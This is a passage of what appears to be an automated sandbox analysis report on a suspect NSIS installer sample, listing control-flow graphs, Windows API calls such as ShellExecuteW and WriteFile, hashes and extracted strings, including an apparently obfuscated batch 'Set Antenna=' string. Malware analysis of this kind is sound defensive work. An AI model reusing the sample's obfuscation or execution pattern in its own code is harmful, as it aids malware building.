                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                          Strings
                                                                                                                                                                          • Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
                                                                                                                                                                          • ... %d%%, xrefs: 004034C8
                                                                                                                                                                          • pAB, xrefs: 004033AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                          • String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
                                                                                                                                                                          • API String ID: 651206458-1427982325
                                                                                                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                          • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                          • API String ID: 1459762280-1711415406
                                                                                                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                          • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                          • API String ID: 247603264-1827671502
                                                                                                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                          APIs
                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
